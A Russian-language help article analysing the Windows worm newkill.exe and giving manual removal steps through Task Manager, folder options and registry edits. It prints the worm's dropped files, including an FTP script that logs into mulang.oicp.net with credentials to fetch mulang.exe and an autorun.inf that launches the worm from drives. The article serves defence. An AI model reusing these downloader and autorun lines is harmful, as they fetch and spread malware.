Путеводитель по сайту

Как уничтожить вирус newkill?

English version Распечатать

***

***

 

***

Как уничтожить вирус newkill?

Что такое newkill.exe

В последнее время активизировался и начинает распространяться новый вирус – newkill.exe.

Визуально исполняемый файл вируса – newkill.exe – обозначается иконкой, стилизованной под надкусанное яблоко с листочком и шестью лучами (то ли это стилизация под логотип Apple, то ли этим показано, что вирус создан фанатом Apple и предназначен для ОС Windows).

Исполняемый файл вируса упакован Aspack'ом.

Вирус предназначен для 32-битной платформы ОС Windows с процессором x86.

Родина вируса – Китай.

Примерная дата появления вируса – начало 2008 г. (автор статьи обнаружил первый вирус newkill.exe 24 февраля 2008 г.).

 

Этимология названия

Судя по всему, название newkill образовано от сокращения фразы new killer – новый убийца (претенциозное название!).

 

Деструктивные действия вируса:

– при запуске/автозапуске вируса в корневую директорию заражаемого диска копируются файлы autorun.inf и newkill.exe (553КБ);

– в папке \WINDOWS вирус создает скрытый файл getfile.cmd (18 байт) с содержимым: ftp -s:ftp32.dat;

– в папке \WINDOWS вирус создает скрытый файл ftp32.dat (82 байт) с содержимым:

  open mulang.oicp.net

  chiyiming

  3813372

  cd mulang

  binary

  get mulang.exe

  bye

– в папке \WINDOWS вирус создает скрытый файл instsrv.exe (37,0КБ);

– в папке \WINDOWS вирус создает скрытый файл killcopy.exe (553КБ);

– в папке \WINDOWS вирус создает скрытый файл srvany.exe (13,0КБ);

– в папке \Temp\ вирус создает папку E_4, содержащую файл krnln.fnr (1,05МБ);

– вирус включает протокол TCPv6, используя системную утилиту настройки IPv6 (\WINDOWS\system32\ipv6.exe; включается командой ipv6 install); после этого в составе автоматически стартующих системных служб появляется IPv6;

– используя службу IPv6, с помощью файла ftp32.dat вирус создает на ПК ftp-сервер и, если соединение с Интернетом открыто, пытается загрузить с китайских сайтов mulang.oicp.net и dl.pconline.com.cn файл mulang.exe;

– файлы killcopy.exe и srvany.exe стартуют автоматически при запуске ОС и постоянно присутствуют в оперативной памяти;

файлы newkill.exe и killcopy.exe копируется и в папку \WINDOWS\system32;

– некоторые разновидности вируса копируют в папку \WINDOWS\system32 файлы caot082.exe, internet.exe, Logo1_.exe, newkill.scr, systemtray.exe;

– при открытии/подключении локальных/съёмных дисков вирус копируется на незаражённые носители;

– вирус производит скрытый вызов следующих dll-библиотек:

   · kernel32.dll (Библиотека клиента Windows NT Base API), которая, в свою очередь, подгружает ntdll.dll (Системная библиотека NT);

   · user32.dll (Библиотека клиента USER API Windows), которая, в свою очередь, подгружает advapi32.dll (Расширенная библиотека API Windows 32), gdi32.dll (GDI Client DLL), msimg32.dll (GDIEXT Client DLL), powrprof.dll (Power Profile Helper DLL), winsta.dll (Winstation Library);

– …

 

Примерное содержимое файла autorun.inf:

[AutoRun]

open=newkill.exe

shellexecute=newkill.exe

shell\ґтїЄ(·А¶ѕДЈКЅ)\command=newkill.exe

shell=ґтїЄ(·А¶ѕДЈКЅ)

 

Как уничтожить newkill

Вопреки заверениям разработчиков антивирусов, ни один антивирус не устранит последствия вирусной атаки, – это нужно сделать вручную!

 

Антивирусы McAfee, Norman, Symantec, Trend Micro до сих пор не могут идентифицировать вирус newkill.

 

Как ликвидировать newkill вручную и устранить последствия вирусной атаки

1. Запустите Диспетчер задач Windows (любым способом – или с помощью Ctrl+Alt+Del, или с помощью Пуск –> Выполнить… –> taskmgr –> OK);

– выгрузите из памяти файлы newkill.exe, killcopy.exe и srvany.exe.

 

2. Поскольку у файлов вируса установлены атрибуты Скрытый, Системный, Только для чтения, чтобы найти их и уничтожить:

– откройте Мой компьютер, выберите меню Сервис –> Свойства папки… (или нажмите Пуск –> Настройка –> Панель управления –> Свойства папки);

– в открывшемся диалоговом окне Свойства папки откройте вкладку Вид;

– в разделе Дополнительные параметры установите флажок Отображать содержимое системных папок, снимите флажок Скрывать защищенные системные файлы, установите переключатель Показывать скрытые файлы и папки –> OK.

 

3. Последовательно откройте локальные и съёмные диски, найдите и удалите файлы newkill.exe, killcopy.exe и autorun.inf в корневых папках дисков;

– в папках \WINDOWS и \WINDOWS\system32 удалите файлы newkill.exe, killcopy.exe, srvany.exe, getfile.cmd, ftp32.dat, instsrv.exe, mulang.exe, caot082.exe, internet.exe, Logo1_.exe, newkill.scr, systemtray.exe;

– в папке \Temp\ удалите файл krnln.fnr.

 

4. Нажмите Пуск –> Выполнить… –> в поле Открыть введите regedit –> OK;

– раскройте ветвь [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon], проверьте значение строкового (REG_SZ) параметра Shell (должно быть Explorer.exe);

– проверьте значение строкового (REG_SZ) параметра Userinit, – должно быть C:\Windows\system32\userinit.exe, (если система установлена на диске C:\, если на другом диске, то <буква_диска>:\Windows\system32\userinit.exe,);

– раскройте раздел [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]. Если он содержит подразделы newkill и killcopy, удалите эти подразделы;

– раскройте раздел [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]. Если он содержит строковый (REG_SZ) параметр C:\WINDOWS\System32\newkill.exe, – удалите его;

– в разделах [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TCPv6] и [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TCPv6] удалите расширяемые строковые (REG_EXPAND_SZ) параметры ImagePath со значением C:\WINDOWS\srvany.exe;

– в разделах [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TCPv6\Parameters] и [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TCPv6\Parameters] удалите строковые (REG_SZ) параметры Application со значением C:\WINDOWS\killcopy.exe;

– выберите меню Правка –> Найти…;

– в открывшемся окне Поиск в текстовое поле Найти введите newkill, нажмите Найти далее;

– найденный параметр, содержащий ссылку на файл newkill, удалите;

– нажимайте F3, пока не появится окно с сообщением Поиск в реестре завершен;

– также найдите и удалите все параметры, содержащие ссылки на файлы srvany и killcopy;

– закройте Редактор реестра.

 

5. Перерегистрируйте (с помощью Сервера регистрации regsvr32.exe) Общую библиотеку оболочки Windows shell32.dll:

– нажмите Пуск –> Выполнить… –> в поле Открыть введите regsvr32 /i shell32.dll –> OK;

– появится окно RegSvr32 с сообщением «DllRegisterServer and DllInstall в shell32.dll завершено успешно», нажмите OK.

 

6. Если вы не используете протокол TCPv6, отключите его:

– нажмите Пуск –> Настройка –> Панель управления –> Администрирование –> Службы (или Пуск –> Выполнить… –> в выпадающем списке Открыть диалогового окна Запуск программы введите services.msc –> OK);

– в диалоговом окне Службы найдите службу TCPv6;

– щелкните Остановить службу;

– двойным щелчком вызовите окно TCPv6 – свойства;

– на вкладке Общие в выпадающем списке Тип запуска выберите Отключено –> OK.

 

 

Примечания

1. Внимание! Будьте осторожны при манипуляциях с Реестром! Некорректное использование Редактора реестра может привести к возникновению серьёзных неполадок, вплоть до переустановки операционной системы!

2. Помните, что предупредить легче, чем лечить! Пользуйтесь брандмауэрами и надёжными антивирусными программами с регулярно (не менее одного раза в неделю!) обновляемыми базами.

3. Если вы не можете запустить Диспетчер задач, см. Что делать, если появляется сообщение «Диспетчер задач отключен администратором»?

4. Если пункт меню Свойства папки недоступен, см. Что делать, если недоступен пункт меню «Свойства папки»?

5. Если вы не можете запустить Редактор реестра Windows, см. Что делать, если появляется сообщение «Редактирование реестра запрещено администратором системы»?

6. Если вы не можете открыть флешку, см. Что делать, если после лечения от вирусов не открывается флешка?

7. Не полагайтесь на антивирусный монитор: всегда перед копированием и открытием проверяйте антивирусным сканером все исполняемые файлы и документы (особенно файлы на дискетах, флешках, компакт-дисках, полученные по Интернету).

8. См. Как устранить последствия вирусной атаки?

9. См. Windows: как отобразить скрытые файлы и папки?

 

Валерий Сидоров

 

 

***

Раскрывая тайны Windows…

Дело о…

Статьи о ПК и PC

Вирусы vs. антивирусы

Apple = iСтив + iPod + iPhone + iPad + iTunes + iMac + …

Apps for iPad, iPhone, iPod touch…

 

 

 

 

 

Путеводитель по сайту

18+

© Сидоров В.В. 2016. All rights reserved.

Авторство всех материалов сайта http://netler.ru принадлежит Валерию Сидорову и охраняется Законом о защите авторских прав. Использование материалов сайта в offline-изданиях без согласования с автором категорически запрещается. В online-изданиях разрешается использовать материалы сайта при условии сохранения имени и фамилии автора и активной гиперссылки на сайт http://netler.ru.